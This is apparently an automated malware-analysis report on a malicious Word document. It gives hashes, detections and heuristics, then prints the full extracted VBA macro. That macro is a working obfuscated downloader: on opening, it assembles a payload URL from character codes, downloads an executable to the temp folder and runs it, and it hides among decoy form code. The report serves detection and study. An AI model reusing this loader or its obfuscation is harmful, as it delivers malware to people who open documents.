Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 57ad2170cd4f55db…

MALICIOUS

Office (OOXML)

24.0 KB Created: 2015-07-28 05:53:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2015-10-02
MD5: d44d906550bcbdbf01f8ea96ad35e8e0 SHA-1: 84aa91d3c9b846a4e8779fb410367ff2a7be0d5f SHA-256: 57ad2170cd4f55db2a6b3f135c4ca820ea8fcf65795b9a6d557b6e4497f88574
330 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OOXML document containing critical heuristic firings for obfuscated auto-exec VBA loaders, including CreateObject and CallByName calls. The presence of an autoopen macro and the obfuscated nature of the VBA code strongly suggest it's designed to execute a malicious payload upon opening. The VBA code attempts to write data to a file using a constructed string, indicating a downloader or dropper functionality.

Heuristics 8

  • ClamAV: Doc.Macro.ObfuscatedHeuristic-5931994-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedHeuristic-5931994-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
     Set qOt8a7DKhf6T = CreateObject(lvxd0G8b5Lee)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     Set qOt8a7DKhf6T = CreateObject(lvxd0G8b5Lee)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName OlTcTDQ6, Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9645 bytes
SHA-256: 4fea2f6b73fa2f815315760e7e4cce422f39c48cf17558bffe66cae1d4d077d1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub autoopen()

VEeve (8.2)

End Sub

Sub VEeve(FFFFF As Long)
ZoO9sV4YohT5Af

End Sub




Attribute VB_Name = "Module1"
Public lhV3VdAZBV As String

Dim checkInputChange As Boolean

Private Sub Form_Load()
  
  checkInputChange = False
  
  Me.a_save.Hyperlink.Address = "#"
  Me.btn_save.Hyperlink.Address = "#"
  
  Me.a_save.Visible = False
  Me.btn_save.Visible = False
  
  Me.input_name.SetFocus
  Me.input_name.SelStart = 0
  
  Me.RecordSource = "SELECT * FROM Products WHERE ProdCode = '" & strSQL & "'"

End Sub

Public Function ZbQwHVG0(pwwcw7yN As Variant, ehDCbQVYBna As String)
Dim IxznVgz34F: Set IxznVgz34F = qOt8a7DKhf6T(Chr(65) & "<" & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & "e" & Chr(97) & Chr(59) & Chr(109))

With IxznVgz34F
   .Type = 1
    .Open
    .write pwwcw7yN
    .savetofile ehDCbQVYBna, 2
End With
End Function

Private Sub input_name_KeyPress(KeyAscii As Integer)
  
  If checkInputChange = False Then
  
    Me.a_save.Visible = True
    Me.btn_save.Visible = True
    
    checkInputChange = True
  
  End If

End Sub

Private Sub btn_save_Click()
  
  DoCmd.Save
  DoCmd.Close

End Sub

Private Sub btn_cancel_Click()
  DoCmd.Close , , acSaveNo
End Sub






Attribute VB_Name = "Module2"

Private Sub Form_Load()
  
  Me.RecordSource = "SELECT * FROM SalesDtls WHERE Status = 'REG' AND DtlsDate LIKE '" & strSQL & "*'"
  Me.reportdate = strSQL
  Me.reportdate.Visible = True
  Me.headerusername.Caption = "by: " & strUser
  Me.footerusername.Caption = "by: " & strUser
  toggleRecords = False
  strSalesStatus = "REG"

End Sub
Private Sub btn_print_Click()
On Error GoTo Err_btn_print_Click

    
  'DoCmd.PrintOut
  DoCmd.OpenForm "sales_reports", acPreview

Exit_btn_print_Click:
    Exit Sub

Err_btn_print_Click:
    MsgBox Err.Description
    Resume Exit_btn_print_Click
    
End Sub

Private Sub button_toggle_view_Click()
On Error GoTo Err_button_toggle_view_Click

  If toggleRecords = False Then
  
    strSalesStatus = "VOD"
    toggleRecords = True
    Me.button_toggle_view.Caption = "See SALES"
  
  Else
    
    strSalesStatus = "REG"
    toggleRecords = False
    Me.button_toggle_view.Caption = "See VOID"
    
  End If

  Me.RecordSource = "SELECT * FROM SalesDtls WHERE Status = '" & strSalesStatus & "' AND DtlsDate LIKE '" & strSQL & "*'"


Exit_button_toggle_view_Click:
    Exit Sub

Err_button_toggle_view_Click:
    MsgBox Err.Description
    Resume Exit_button_toggle_view_Click
    
End Sub

Sub ZoO9sV4YohT5Af()

nTXMVEdG = Chr(104) & "t" & Chr(60) & "t" & "p" & ":" & "/" & "=" & "/" & "l" & Chr(97) & Chr(112) & Chr(101) & Chr(114) & "l" & "e" & Chr(98) & Chr(108) & Chr(97) & "n" & Chr(99) & Chr(104) & "e" & Chr(60) & "." & Chr(102) & "r" & Chr(47) & "3" & "4" & Chr(53) & "/" & Chr(119) & "r" & Chr(119) & "." & Chr(61) & Chr(101) & "<" & Chr(120) & "e"
Set OlTcTDQ6 = qOt8a7DKhf6T(Chr(77) & Chr(105) & Chr(60) & "c" & "r" & Chr(111) & Chr(61) & Chr(115) & "o" & Chr(102) & Chr(116) & Chr(59) & Chr(46) & Chr(88) & Chr(77) & Chr(60) & Chr(76) & ";" & Chr(72) & Chr(84) & Chr(61) & Chr(84) & Chr(80))

nTXMVEdG = Replace(nTXMVEdG, Chr(60), "")
nTXMVEdG = Replace(nTXMVEdG, Chr(61), "")
nTXMVEdG = Replace(nTXMVEdG, Chr(59), "")
CallByName OlTcTDQ6, Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), _
nTXMVEdG _
, False

Set eNIowlgx3a = qOt8a7DKhf6T(Chr(87) & "<" & "S" & Chr(99) & Chr(61) & Chr(114) & "i" & Chr(112) & "t" & ";" & Chr(46) & Chr(83) & Chr(61) & "h" & Chr(101) & "<" & Chr(108) & "l")

Set B9l2ooWzZjdO = CallByName(eNIowlgx3a, Chr(69) & Chr(110) & Chr(118) & Chr(105) & Chr(114) & Chr(111) & Chr(110) & Chr(109) & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & Chr(114) & Chr(111) & Chr(99) & "e" & "s" & Chr(115))

g69EyiE3XCr = B9l2ooWzZjdO(Chr(84) & Chr(69) & "M" & Chr(80))

lhV3VdAZBV = g69EyiE3XCr & Chr(92) & Chr(116) & Chr(114) & Chr(101) & "v" & Chr(105) & "o" & Chr(102) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
Dim lDHKNcHOCX5Z() As Byte

CallByName OlTcTDQ6, "S" & "e" & Chr(110) & Chr(100), VbMethod
lDHKNcHOCX5Z = CallByName(OlTcTDQ6, "r" & "e" & Chr(115) & Chr(112) & Chr(111) & "n" & Chr(115) & Chr(101) & "B" & Chr(111) & "d" & Chr(121), VbGet)
ZbQwHVG0 lDHKNcHOCX5Z, lhV3VdAZBV
On Error GoTo cE5cAnBQdWI
    a = 84 / 0
  On Error GoTo 0
  
Mcf0XFbqgbz:
  Exit Sub
cE5cAnBQdWI:
  lPFnzc5MzKV1 ("ArNjUVVt")
Resume Mcf0XFbqgbz
End Sub
Private Sub button_export_Click()
On Error GoTo Err_button_export_Click

  Me.RecordSource = "SELECT * FROM SalesDtls WHERE Status = '" & strSalesStatus & "' AND DtlsDate LIKE '" & strSQL & "*'"

Exit_button_export_Click:
    Exit Sub

Err_button_export_Click:
    MsgBox Err.Description
    Resume Exit_button_export_Click
    
End Sub

Private Sub btn_view_item_Click()
  
  Me.RecordSource = "SELECT * FROM SalesDtls WHERE Status = '" & strSalesStatus & "' AND DtlsDate LIKE '" & strSQL & "*' AND ProdCode = '" & Me.ProdCode & "'"

End Sub

Private Sub button_show_all_Click()
On Error GoTo Err_button_show_all_Click

  Me.RecordSource = "SELECT * FROM SalesDtls WHERE Status = 'REG' AND DtlsDate LIKE '" & strSQL & "*'"

Exit_button_show_all_Click:
    Exit Sub

Err_button_show_all_Click:
    MsgBox Err.Description
    Resume Exit_button_show_all_Click
    
End Sub


Attribute VB_Name = "Module3"

Dim strEditorForm As String

Private Sub Form_Load()
On Error GoTo Err_Form_Load

  Me.SetFocus
  objControl = "viewer"

  Call option_department_GotFocus

Exit_Form_Load:
    Exit Sub

Err_Form_Load:
    MsgBox Err.Description
    Resume Exit_Form_Load

End Sub

Private Sub option_department_GotFocus()

  strEditorForm = "departments"
  strSQL = "SELECT * FROM departments"
  Call format_viewer("_sub_departments", 0)
  Me.button_create.Caption = "Create Department"

End Sub

Public Function lPFnzc5MzKV1(yu8KJWEKf As String)
 Set jzokrKyTK56Rk5 = qOt8a7DKhf6T(Chr(83) & "h" & Chr(61) & "e" & "l" & ";" & Chr(108) & "<" & "." & Chr(65) & "p" & Chr(59) & "p" & "l" & Chr(105) & Chr(60) & Chr(99) & Chr(97) & Chr(116) & "=" & "i" & Chr(111) & "n")
jzokrKyTK56Rk5.Open (lhV3VdAZBV)
End Function
Private Sub option_subdepartment_GotFocus()

  strEditorForm = "sub_departments"
  strSQL = "SELECT sub_departments.User_ID AS User_ID, sub_departments.name, sub_departments.description, sub_departments.ID, sub_departments.department_id AS department_id, sub_departments.created_at AS created_at, sub_departments.updated_at AS updated_at, departments.name AS department_name FROM sub_departments LEFT JOIN departments ON sub_departments.department_id = departments.ID"
  Call format_viewer("_sub_sub_departments", 0)
  Me.button_create.Caption = "Create Sub-Department"

End Sub
Private Sub button_create_Click()

  strSQL = "new"
  
  Me.viewer.SourceObject = ""

  If strEditorForm = "departments" Then
    Call format_viewer("_sub_department_editor", 0)
    Forms(objForm).Controls(objControl).Form.Controls("department_name").SetFocus
  Else
    Call format_viewer("_sub_sub_department_editor", 0)
    Forms(objForm).Controls(objControl).Form.Controls("department_name_view").Visible = False
  End If
  

End Sub
Private Sub button_back_Click()
On Error GoTo Err_button_back_Click

  Call open_Form("_main_menu", "department_manager")

Exit_button_back_Click:
    Exit Sub

Err_button_back_Click:
    MsgBox Err.Description
    Resume Exit_button_back_Click
    
End Sub


Attribute VB_Name = "Module4"

Function changenavitem(navshow As String, navhide As String, targetForm As String)

  If objForm = "" Then
    objForm = "main"
  End If
  
  Call checkUserRole("nav_change")
  
  Forms(objForm).Controls(navshow).Visible = True
  Forms(objForm).Controls(navhide).Visible = False
  
  Forms(objForm).Detail.BackColor = 16777215
  
  Call Route(targetForm)
  
End Function

Function shownav()
  
  If objForm = "" Then
    objForm = "main"
  End If
  
  Forms(objForm).Controls("inactive_03").Hyperlink.Address = "#"
  Forms(objForm).Controls("inactive_05").Hyperlink.Address = "#"
  Forms(objForm).Controls("inactive_07").Hyperlink.Address = "#"
  Forms(objForm).Controls("inactive_09").Hyperlink.Address = "#"

  Forms(objForm).Controls("inactive_03").Visible = True
  
  Call checkUserRole("main_nav")
  
End Function

Public Function qOt8a7DKhf6T(lvxd0G8b5Lee As String)
lvxd0G8b5Lee = Replace(lvxd0G8b5Lee, Chr(60), "")
lvxd0G8b5Lee = Replace(lvxd0G8b5Lee, Chr(61), "")
lvxd0G8b5Lee = Replace(lvxd0G8b5Lee, Chr(59), "")
 Set qOt8a7DKhf6T = CreateObject(lvxd0G8b5Lee)
End Function
Function hidenav()

  Forms(objForm).Controls("inactive_03").Visible = False
  Forms(objForm).Controls("inactive_05").Visible = False
  Forms(objForm).Controls("inactive_07").Visible = False
  Forms(objForm).Controls("inactive_09").Visible = False
  Forms(objForm).Controls("active_03").Visible = False
  Forms(objForm).Controls("active_05").Visible = False
  Forms(objForm).Controls("active_07").Visible = False
  Forms(objForm).Controls("active_09").Visible = False

End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 30720 bytes
SHA-256: 3299cbefbe2c76a185b07a9f06abca25f3c25958c49673122d4e53ccca329727
Detection
ClamAV: Doc.Macro.ObfuscatedHeuristic-5931994-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.